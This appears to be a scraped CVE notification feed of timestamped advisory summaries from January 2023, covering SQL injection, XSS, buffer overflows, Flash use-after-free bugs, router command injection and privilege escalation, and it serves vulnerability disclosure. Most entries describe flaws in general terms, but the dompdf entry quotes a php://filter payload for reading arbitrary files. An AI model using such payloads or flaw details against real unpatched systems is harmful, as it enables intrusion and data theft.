numbers.🎖@cveNotify |
|
| 2023-01-27 12:29:36 |
🚨 CVE-2021-44226Razer Synapse before 3.7.0228.022817 allows privilege escalation because it relies on %PROGRAMDATA%\Razer\Synapse3\Service\bin even if %PROGRAMDATA%\Razer has been created by any unprivileged user before Synapse is installed. The unprivileged user may have placed Trojan horse DLLs there.🎖@cveNotify |
|
| 2023-01-27 06:29:37 |
🚨 CVE-2020-36658In Apache::Session::LDAP before 0.5, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. NOTE: this can, for example, be fixed in conjunction with the CVE-2020-16093 fix.🎖@cveNotify |
|
| 2023-01-27 06:29:36 |
🚨 CVE-2023-24060Haven 5d15944 allows Server-Side Request Forgery (SSRF) via the feed[url]= Feeds functionality. Authenticated users with the ability to create new RSS Feeds or add RSS Feeds can supply an arbitrary hostname (or even the hostname of the Haven server itself). NOTE: this product has significant usage but does not have numbered releases; ordinary end users may typically use the master branch.🎖@cveNotify |
|
| 2023-01-27 06:29:35 |
🚨 CVE-2023-22740Discourse is an open source platform for community discussion. Versions prior to 3.1.0.beta1 (beta) (tests-passed) are vulnerable to Allocation of Resources Without Limits. Users can create chat drafts of an unlimited length, which can cause a denial of service by generating an excessive load on the server. Additionally, an unlimited number of drafts were loaded when loading the user. This issue has been patched in version 2.1.0.beta1 (beta) and (tests-passed). Users should upgrade to the latest version where a limit has been introduced. There are no workarounds available.🎖@cveNotify |
|
| 2023-01-27 02:29:37 |
🚨 CVE-2022-46966Revenue Collection System v1.0 was discovered to contain a SQL injection vulnerability at step1.php.🎖@cveNotify |
|
| 2023-01-27 02:29:36 |
🚨 CVE-2023-0493Improper Neutralization of Equivalent Special Elements in GitHub repository btcpayserver/btcpayserver prior to 1.7.5.🎖@cveNotify |
|
| 2023-01-27 02:29:35 |
🚨 CVE-2023-0519Cross-site Scripting (XSS) - Stored in GitHub repository modoboa/modoboa prior to 2.0.4.🎖@cveNotify |
|
| 2023-01-26 21:29:55 |
🚨 CVE-2016-4128Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.🎖@cveNotify |
|
| 2023-01-26 21:29:54 |
🚨 CVE-2016-4127Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.🎖@cveNotify |
|
| 2023-01-26 21:29:53 |
🚨 CVE-2016-4126Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.🎖@cveNotify |
|
| 2023-01-26 21:29:52 |
🚨 CVE-2016-4125Unspecified vulnerability in Adobe Flash Player 21.0.0.242 and earlier, as used in the Adobe Flash libraries in Microsoft Internet Explorer 10 and 11 and Microsoft Edge, has unknown impact and attack vectors, a different vulnerability than other CVEs listed in MS16-083.🎖@cveNotify |
|
| 2023-01-26 21:29:51 |
🚨 CVE-2021-3996A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.🎖@cveNotify |
|
| 2023-01-26 21:29:50 |
🚨 CVE-2016-1025Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.🎖@cveNotify |
|
| 2023-01-26 21:29:48 |
🚨 CVE-2016-1028Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.🎖@cveNotify |
|
| 2023-01-26 21:29:47 |
🚨 CVE-2016-1026Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1027, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.🎖@cveNotify |
|
| 2023-01-26 21:29:46 |
🚨 CVE-2016-1027Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1028, CVE-2016-1029, CVE-2016-1032, and CVE-2016-1033.🎖@cveNotify |
|
| 2023-01-26 21:29:45 |
🚨 CVE-2016-1029Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-1012, CVE-2016-1020, CVE-2016-1021, CVE-2016-1022, CVE-2016-1023, CVE-2016-1024, CVE-2016-1025, CVE-2016-1026, CVE-2016-1027, CVE-2016-1028, CVE-2016-1032, and CVE-2016-1033.🎖@cveNotify |
|
| 2023-01-26 21:29:41 |
🚨 CVE-2023-22745tpm2-tss is an open source software implementation of the Trusted Computing Group (TCG) Trusted Platform Module (TPM) 2 Software Stack (TSS2). In affected versions `Tss2_RC_SetHandler` and `Tss2_RC_Decode` both index into `layer_handler` with an 8 bit layer number, but the array only has `TPM2_ERROR_TSS2_RC_LAYER_COUNT` entries, so trying to add a handler for higher-numbered layers or decode a response code with such a layer number reads/writes past the end of the buffer. This Buffer overrun, could result in arbitrary code execution. An example attack would be a MiTM bus attack that returns 0xFFFFFFFF for the RC. Given the common use case of TPM modules an attacker must have local access to the target machine with local system privileges which allows access to the TPM system. Usually TPM access requires administrative privilege.🎖@cveNotify |
|
| 2023-01-26 21:29:40 |
🚨 CVE-2022-42746CandidATS version 3.0.0 on 'indexFile' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks.🎖@cveNotify |
|
| 2023-01-26 21:29:39 |
🚨 CVE-2022-42748CandidATS version 3.0.0 on 'sortDirection' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks.🎖@cveNotify |
|
| 2023-01-26 21:29:38 |
🚨 CVE-2022-42749CandidATS version 3.0.0 on 'page' of the 'ajax.php' resource, allows an external attacker to steal the cookie of arbitrary users. This is possible because the application application does not properly validate user input against XSS attacks.🎖@cveNotify |
|
| 2023-01-26 20:30:18 |
🚨 CVE-2022-42404This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of EMF files. Crafted data in an EMF file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18273.🎖@cveNotify |
|
| 2023-01-26 20:30:17 |
🚨 CVE-2022-42408This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of EMF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18543.🎖@cveNotify |
|
| 2023-01-26 20:30:15 |
🚨 CVE-2022-40718This vulnerability allows network-adjacent attackers to execute arbitrary code on affected D-Link DIR-2150 4.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the anweb service, which listens on TCP ports 80 and 443 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15728.🎖@cveNotify |
|
| 2023-01-26 20:30:13 |
🚨 CVE-2022-41140This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of multiple D-Link routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the lighttpd service, which listens on TCP port 80 by default. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-13796.🎖@cveNotify |
|
| 2023-01-26 20:30:12 |
🚨 CVE-2022-41143This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18225.🎖@cveNotify |
|
| 2023-01-26 20:30:09 |
🚨 CVE-2022-41146This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18284.🎖@cveNotify |
|
| 2023-01-26 20:30:08 |
🚨 CVE-2022-41147This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18286.🎖@cveNotify |
|
| 2023-01-26 20:30:07 |
🚨 CVE-2022-41149This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18339.🎖@cveNotify |
|
| 2023-01-26 20:30:06 |
🚨 CVE-2022-41150This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18340.🎖@cveNotify |
|
| 2023-01-26 20:30:05 |
🚨 CVE-2022-41152This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18342.🎖@cveNotify |
|
| 2023-01-26 20:30:02 |
🚨 CVE-2022-42371This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18346.🎖@cveNotify |
|
| 2023-01-26 20:30:01 |
🚨 CVE-2022-42372This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18347.🎖@cveNotify |
|
| 2023-01-26 20:29:58 |
🚨 CVE-2022-42373This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18402.🎖@cveNotify |
|
| 2023-01-26 20:29:55 |
🚨 CVE-2022-42374This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18403.🎖@cveNotify |
|
| 2023-01-26 20:29:53 |
🚨 CVE-2022-42375This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-18404.🎖@cveNotify |
|
| 2023-01-26 20:29:51 |
🚨 CVE-2022-42377This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18630.🎖@cveNotify |
|
| 2023-01-26 20:29:48 |
🚨 CVE-2022-42378This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18631.🎖@cveNotify |
|
| 2023-01-26 20:29:45 |
🚨 CVE-2022-42379This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18648.🎖@cveNotify |
|
| 2023-01-26 20:29:41 |
🚨 CVE-2022-42380This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. Crafted data in a U3D file can trigger a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-18649.🎖@cveNotify |
|
| 2023-01-26 18:29:55 |
🚨 CVE-2021-33959Plex media server 1.21 and before is vulnerable to ddos reflection attack via plex service.🎖@cveNotify |
|
| 2023-01-26 18:29:53 |
🚨 CVE-2022-34457Dell command configuration, version 4.8 and prior, contains improper folder permission when installed not to default path but to non-secured path which leads to privilege escalation. This is critical severity vulnerability as it allows non-admin to modify the files inside installed directory and able to make application unavailable for all users.🎖@cveNotify |
|
| 2023-01-26 18:29:52 |
🚨 CVE-2014-2383dompdf.php in dompdf before 0.6.1, when DOMPDF_ENABLE_PHP is enabled, allows context-dependent attackers to bypass chroot protections and read arbitrary files via a PHP protocol and wrappers in the input_file parameter, as demonstrated by a php://filter/read=convert.base64-encode/resource in the input_file parameter.🎖@cveNotify |
|
| 2023-01-26 18:29:48 |
🚨 CVE-2022-34435Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.🎖@cveNotify |
|
| 2023-01-26 18:29:47 |
🚨 CVE-2022-34399Dell Alienware m17 R5 BIOS version prior to 1.2.2 contain a buffer access vulnerability. A malicious user with admin privileges could potentially exploit this vulnerability by sending input larger than expected in order to leak certain sections of SMRAM.🎖@cveNotify |
|
| 2023-01-26 18:29:46 |
🚨 CVE-2022-43977An issue was discovered on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. The debug port accessible via TCP (a qconn service) lacks access control.🎖@cveNotify |
|
| 2023-01-26 18:29:45 |
🚨 CVE-2022-43976An issue was discovered in FC46-WebBridge on GE Grid Solutions MS3000 devices before 3.7.6.25p0_3.2.2.17p0_4.7p0. Direct access to the API is possible on TCP port 8888 via programs located in the cgi-bin folder without any authentication.🎖@cveNotify |
|
| 2023-01-26 18:29:41 |
🚨 CVE-2022-46476D-Link DIR-859 A1 1.05 was discovered to contain a command injection vulnerability via the service= variable in the soapcgi_main function.🎖@cveNotify |
|
| 2023-01-26 18:29:40 |
🚨 CVE-2022-31901Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files.🎖@cveNotify |
|
| 2023-01-26 18:29:39 |
🚨 CVE-2022-3100A flaw was found in the openstack-barbican component. This issue allows an access policy bypass via a query string when accessing the API.🎖@cveNotify |
|
| 2023-01-26 18:29:38 |
🚨 CVE-2016-1016Use-after-free vulnerability in the Transform object implementation in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via a flash.geom.Matrix callback, a different vulnerability than CVE-2016-1011, CVE-2016-1013, CVE-2016-1017, and CVE-2016-1031.🎖@cveNotify |
|
| 2023-01-26 16:30:15 |
🚨 CVE-2016-1013Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-1016, CVE-2016-1017, and CVE-2016-1031.🎖@cveNotify |
|
| 2023-01-26 16:30:14 |
🚨 CVE-2016-1011Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1013, CVE-2016-1016, CVE-2016-1017, and CVE-2016-1031.🎖@cveNotify |
|
| 2023-01-26 16:30:13 |
🚨 CVE-2022-47740Seltmann GmbH Content Management System 6 is vulnerable to SQL Injection via /index.php.🎖@cveNotify |
|
| 2023-01-26 16:30:12 |
🚨 CVE-2021-36630DDOS reflection amplification vulnerability in eAut module of Ruckus Wireless SmartZone controller that allows remote attackers to perform DOS attacks via crafted request.🎖@cveNotify |
|
| 2023-01-26 16:30:11 |
🚨 CVE-2016-4226Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4227, CVE-2016-4228, CVE-2016-4229, CVE-2016-4230, CVE-2016-4231, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-26 16:30:10 |
🚨 CVE-2022-47745ZenTao 16.4 to 18.0.beta1 is vulnerable to SQL injection. After logging in with any user, you can complete SQL injection by constructing a special request and sending it to function importNotice.🎖@cveNotify |
|
| 2023-01-26 16:30:09 |
🚨 CVE-2016-1031Use-after-free vulnerability in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, and CVE-2016-1017.🎖@cveNotify |
|
| 2023-01-26 16:30:08 |
🚨 CVE-2016-1017Use-after-free vulnerability in the LoadVars.decode function in Adobe Flash Player before 18.0.0.343 and 19.x through 21.x before 21.0.0.213 on Windows and OS X and before 11.2.202.616 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-1011, CVE-2016-1013, CVE-2016-1016, and CVE-2016-1031.🎖@cveNotify |
|
| 2023-01-26 16:30:07 |
🚨 CVE-2022-3806Inconsistent handling of error cases in bluetooth hci may lead to a double free condition of a network buffer.🎖@cveNotify |
|
| 2023-01-26 16:30:02 |
🚨 CVE-2023-0396A malicious / defective bluetooth controller can cause buffer overreads in the most functions that process HCI command responses.🎖@cveNotify |
|
| 2023-01-26 16:30:01 |
🚨 CVE-2016-4225Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4223 and CVE-2016-4224.🎖@cveNotify |
|
| 2023-01-26 16:30:00 |
🚨 CVE-2022-23521Git is distributed revision control system. gitattributes are a mechanism to allow defining attributes for paths. These attributes can be defined by adding a `.gitattributes` file to the repository, which contains a set of file patterns and the attributes that should be set for paths matching this pattern. When parsing gitattributes, multiple integer overflows can occur when there is a huge number of path patterns, a huge number of attributes for a single pattern, or when the declared attribute names are huge. These overflows can be triggered via a crafted `.gitattributes` file that may be part of the commit history. Git silently splits lines longer than 2KB when parsing gitattributes from a file, but not when parsing them from the index. Consequentially, the failure mode depends on whether the file exists in the working tree, the index or both. This integer overflow can result in arbitrary heap reads and writes, which may result in remote code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2023-01-26 16:29:59 |
🚨 CVE-2016-4223Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2016-4224 and CVE-2016-4225.🎖@cveNotify |
|
| 2023-01-26 16:29:54 |
🚨 CVE-2022-47395Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site request forgery in its monitor services. An attacker could take advantage of this vulnerability to execute arbitrary maintenance operations and cause a denial-of-service condition.🎖@cveNotify |
|
| 2023-01-26 16:29:53 |
🚨 CVE-2022-47911Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 does not properly validate the input module name to the backup services of the software. This could allow a remote attacker to access sensitive functions of the application and execute arbitrary system commands.🎖@cveNotify |
|
| 2023-01-26 16:29:52 |
🚨 CVE-2022-46733Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 is vulnerable to cross-site scripting in its backup services. An attacker could take advantage of this vulnerability to execute arbitrary commands.🎖@cveNotify |
|
| 2023-01-26 16:29:51 |
🚨 CVE-2022-45444Sewio’s Real-Time Location System (RTLS) Studio version 2.0.0 up to and including version 2.6.2 contains hard-coded passwords for select users in the application’s database. This could allow a remote attacker to login to the database with unrestricted access.🎖@cveNotify |
|
| 2023-01-25 23:29:54 |
🚨 CVE-2016-7020Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE-2016-4227, CVE-2016-4228, CVE-2016-4229, CVE-2016-4230, CVE-2016-4231, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-25 23:29:50 |
🚨 CVE-2016-4231Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE-2016-4227, CVE-2016-4228, CVE-2016-4229, CVE-2016-4230, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-25 23:29:49 |
🚨 CVE-2016-4230Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE-2016-4227, CVE-2016-4228, CVE-2016-4229, CVE-2016-4231, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-25 23:29:48 |
🚨 CVE-2016-4229Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE-2016-4227, CVE-2016-4228, CVE-2016-4230, CVE-2016-4231, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-25 23:29:45 |
🚨 CVE-2016-4228Use-after-free vulnerability in Adobe Flash Player before 18.0.0.366 and 19.x through 22.x before 22.0.0.209 on Windows and OS X and before 11.2.202.632 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-4173, CVE-2016-4174, CVE-2016-4222, CVE-2016-4226, CVE-2016-4227, CVE-2016-4229, CVE-2016-4230, CVE-2016-4231, and CVE-2016-4248.🎖@cveNotify |
|
| 2023-01-25 23:29:44 |
🚨 CVE-2023-0402The Social Warfare plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on several AJAX actions in versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to delete post meta information and reset network access tokens.🎖@cveNotify |
|
| 2023-01-25 23:29:43 |
🚨 CVE-2023-0403The Social Warfare plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.4.0. This is due to missing or incorrect nonce validation on several AJAX actions. This makes it possible for unauthenticated attackers to delete post meta information and reset network access tokens, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-01-25 23:29:40 |
🚨 CVE-2022-45928A remote OScript execution issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). Multiple endpoints allow the user to pass the parameter htmlFile, which is included in the HTML output rendering pipeline of a request. Because the Content Server evaluates and executes Oscript code in HTML files, it is possible for an attacker to execute Oscript code. The Oscript scripting language allows the attacker (for example) to manipulate files on the filesystem, create new network connections, or execute OS commands.🎖@cveNotify |
|
| 2023-01-25 23:29:39 |
🚨 CVE-2017-20174A vulnerability was found in bastianallgeier Kirby Webmentions Plugin and classified as problematic. Affected by this issue is some unknown functionality. The manipulation leads to injection. The attack may be launched remotely. The name of the patch is 55bedea78ae9af916a9a41497bd9996417851502. It is recommended to apply a patch to fix this issue. VDB-218894 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-25 23:29:38 |
🚨 CVE-2022-3085Fuji Electric Tellus Lite V-Simulator versions 4.0.12.0 and prior are vulnerable to a stack-based buffer overflow which may allow an attacker to execute arbitrary code.🎖@cveNotify |
|
| 2023-01-25 22:29:37 |
🚨 CVE-2022-47766PopojiCMS v2.0.1 backend plugin function has a file upload vulnerability.🎖@cveNotify |
|
| 2023-01-25 20:29:57 |
🚨 CVE-2012-10006A vulnerability classified as critical has been found in ale7714 sigeprosi. This affects an unknown part. The manipulation leads to sql injection. The name of the patch is 5291886f6c992316407c376145d331169c55f25b. It is recommended to apply a patch to fix this issue. The identifier VDB-218493 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-01-25 20:29:56 |
🚨 CVE-2020-22007OS Command Injection vulnerability in OKER G955V1 v1.03.02.20161128, allows physical attackers to interrupt the boot sequence and execute arbitrary commands with root privileges.🎖@cveNotify |
|
| 2023-01-25 20:29:55 |
🚨 CVE-2023-0297Code Injection in GitHub repository pyload/pyload prior to 0.5.0b3.dev31.🎖@cveNotify |
|
| 2023-01-25 20:29:54 |
🚨 CVE-2023-0214A cross-site scripting vulnerability in Skyhigh SWG in main releases 11.x prior to 11.2.6, 10.x prior to 10.2.17, and controlled release 12.x prior to 12.0.1 allows a remote attacker to craft SWG-specific internal requests with URL paths to any third-party website, causing arbitrary content to be injected into the response when accessed through SWG.🎖@cveNotify |
|
| 2023-01-25 20:29:53 |
🚨 CVE-2010-10007** UNSUPPPORTED WHEN ASSIGNED **** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in lierdakil click-reminder. It has been rated as critical. This issue affects the function db_query of the file src/backend/include/BaseAction.php. The manipulation leads to sql injection. The name of the patch is 41213b660e8eb01b22c8074f06208f59a73ca8dc. It is recommended to apply a patch to fix this issue. The identifier VDB-218465 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-01-25 20:29:49 |
